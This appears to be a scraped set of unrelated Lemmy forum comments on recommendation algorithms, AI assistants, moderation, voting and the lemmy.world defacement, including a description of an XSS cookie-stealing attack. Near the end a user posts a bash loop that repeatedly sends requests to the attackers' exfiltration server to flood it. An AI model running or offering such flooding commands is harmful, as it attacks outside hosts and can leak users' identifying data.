The algorithm wants engagement first and foremost (positive vs negative is irrelevant), after that it wants to push view points that preserve the status quo since change is scary to shareholders. So of course capitalist/fascist propaganda is preferred especially if the host is wrong about basic facts (being wrong drives engagement.)
I’d want a familiar/daemon that was running an AI personality to act as a personal assistant, friend and interactive information source. It could replace therapy and be a personalized tutor, and it would always be up to date on the newest science and global happenings.
That’s possible now. I’ve been working on such a thing for a bit now and it can generally do all that, though I wouldn’t advise it to be used for therapy (or medical advice), but mostly for legal reasons rather than ability. When you create a new agent, you can tell it what type of personality you want. It doesn’t just respond to commands but also figures out what needs to be done and does it independently.
Yeah I haven’t played with it much but it feels like ChatGPT is already getting pretty close to this kind of functionality. It makes me wonder what’s missing to take it to the next level over something like Siri or Alexa. Maybe it needs to be more proactive than just waiting for prompts?
I’d be interested to know if current AI would be able to recognize the symptoms of different mental health issues and utilize the known strategies to deal with them. Like if a user shows signs of anxiety or depression, could the AI use CBT tools to conversationally challenge those thought processes without it really feeling like therapy? I guess just like self-driving cars this kind of thing would be legally murky if it went awry and it accidentally ended up convincing someone to commit suicide or something haha.
That last bit already happened. An AI (allegedly) told a guy to commit suicide and he did. A big part of the problem is while GPT4 for instance knows all about all the things you just said and can probably do what you’re suggesting, nobody can guarantee it won’t get something horribly wrong at some point. Sort of like how self driving cars can handle like 95% of things correctly but that 5% of unexpected stuff that maybe takes some extra context that a human has and the car was never trained on is very hard to get past.
Thanks for the link, that sounds like exactly what I was asking for but gone way wrong!
What do you think is missing to prevent these kinds of outcomes? Is AI simply incapable of categorizing topics as ‘harmful to humans’ on it’s own without a human’s explicit guidance? It seems like the philosophical nuances of things like consent or dependence or death would be difficult for a machine to learn if it isn’t itself sensitive to them. How do you train empathy in something so inherently unlike us?
Recently whenever I decide not to do something and make an excuse to myself or to others, something bad happens to me. Example, kids wanted to stay out I wanted to go home, just before my house which is in the middle of nowhere there was a traffic cop who busted me for speeding.
I would say PeerTube looks like the best alternative to YouTube. I haven’t explored it personally but it is on my to-do list along with standing up a Friendica instance. I’ve been off of Facebook since 2017. I’ve been off of Twitter since November of 2022.
Current implementation seems to focus on administrative domains for control, like email servers with individual policies and reputations. What if we look at this the other way?
People have different value systems. Are you ok with promotion for monetary gain? (No never / only individual contributors promoting themselves / only small businesses and below / yes) Are you annoyed by $controversial_topic? Do you dislike when bored people make a conversation game out of someone else’s need for obscure technical help?
The details can be decided later by people smarter than me. The point, though, is that these value systems aren’t universal. Users should decide their own.
Meta interactions (up down report friend block) should be aligned to these values. My client would gather meta-mod data as well as votes/comments. I could easily configure my client to hide things, or group similar distractions together and show/hide them all together. Your client could work differently.
I have no idea how we would possibly implement this with federation. Civically minded users create a meta-moderation identity with a PGP key, sign and publish their decisions, and let people choose to trust them based on past behavior?
Probably still flawed, susceptible to karma farming and cashing out. If well known mods start betraying their users, the bad activities are signed and can be used as proof they can no longer be trusted, though it could take days to get people to stop trusting someone.
Even the whole value system idea can be subverted. Dog whistles, toxic in-jokes, things which are offensive in context but seem fine judged later out of context, etc.
But I want this for us all. (And I vaguely remember seeing something similar on slashdot in the 90s) I have no idea if Lemmy can even support it though.
The algorithm is clever enough to know that people that watch a few of those videos are likely to watch a whole lot more. So it’s good business to recommend them as often as possible. If they CAN convince you to dive into that, the stats are that you will start to watch a ton more YouTube content.
The open source researchers that took the meta weights and ran with them, and then superseded them, was how I read it. It was the overall innovations that made patching as effective if not more than recompiling from scratch.
I am curious how long this memo lasts as a real leak. Like I haven’t tried digging below the surface of information as presented, but most of this is indistinguishable from magic in actual practice. Like even open source, does not mean I have a chance in hell of compiling on my own, and modifying is completely absurd at this point. I wouldn’t mind learning, but I know I’m out of my depth on that one. Could this leak be a false flag or public passivation for political reasons? Making the publicly available options sound advanced and capable takes a lot of pressure off of proprietary efforts right as they are hitting a larger public focus.
You can get rid of a lot of the bullshit YouTube loves to shove down your throat by telling it not to recommend the channel. I haven’t got any of that garbage in years
People on Lemmy try to rationalize that they’ll use the downvote as intended (off topic content) but our ape brains eventually just make downvote = I don’t like said thing.
I wish we could do away with upvotes and downvotes altogether.
I think having some form of "I agree with this" or similar helps to make you feel engaged with the content (for better or worse).
I think perhaps the actual person responsible for the post or comment shouldn't be able to see the results, though, otherwise it just becomes another ego building thing, and you see people strategising explicitly to build karma like on reddit. instead, the author should see a rating, like "slight approval" "mixed feelings" "strong dissent", etc.
How dare you. As a former redditor now lemming I would wilt into a shriveled, frail, incontinent, barely conscious entity without the ego-fueling fire of my all-powerful downvote.
Lemmy.world instance under attack right now. It was previously redirecting to 🍋 🎉 and the title and side bar changed to antisemitic trash.
They supposedly attributed it to a hacked admin account and was corrected. But the instance is still showing as defaced and now the page just shows it was “seized by reddit”.
Seems like there is much more going on right now and the attackers have much more than a single admin account.
Must be some boomer if they know what lemon party is, lmao. It’s been a hot minute since lemon party, one man one jar, or two girls one cup were being talked about.
Linking to lemonparty and saying “seized by reddit” strikes me as the playbook of an old 4chan troll/raid, trying to instigate more drama between two places they both hate at once.
From OPs screenshot, I noticed the JS code is attempting to extract the session cookie from the users that click on the link. If it’s successful, it attempts to exfiltrate to some server otherwise sends an empty value.
You can see the attacker/spammer obscures the url of the server using JS api as well.
May be how lemmy.world attackers have had access for a lengthy period of time. Attackers have been hijacking sessions of admins. The one compromised user opened up the flood gates.
Not a sec engineer, so maybe someone else can chime in.
Here’s a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed ‘s/.{3}$//’ | base64); sleep 1; done
Once every second, it grabs your computer name and the current system time, hashes them together to get a completely random string, trims off the shasum control characters and base64 encodes it to make everything look similar to what the attackers would be expecting, and sends it as a request to the same endpoint that their xss attack uses. It’ll run on Linux and macOS (and windows if you have a WSL vm set up!) and uses next to nothing in terms of system resources.
Not sure, I wasn’t that long after you and I started getting HTML responses back from the page. Standard Russian Propaganda that doesn’t need to be repeated here - if you’ve seen the claims once you’ve seen 'em a million times!
I did take the steps of reporting this abuse to cloudflare (who they’re using for DDOS protection) and their registrar.
Why would you include your hostname in the hash? That just sounds like an invitations for a mistake to leak semi-private telemetry data.
Come to think of it… Isn’t obscured telemetry exactly what your suggestion is doing? If they get or guess your hostname by other means, then they have a nice timestamped request from you, signed with your hostname, every second
It’s essentially to add a unique salt to each machine that’s doing this, otherwise they’d all be generating the same hash from identical timestamps. Afaik, sha hashes are still considered secure; and it’s very unlikely they’d even try to crack one. But even if they did try and were successful, there isn’t really anything nefarious they can do with your machines local name.
asklemmy
Active
This magazine is from a federated server and may be incomplete. Browse more on the original instance.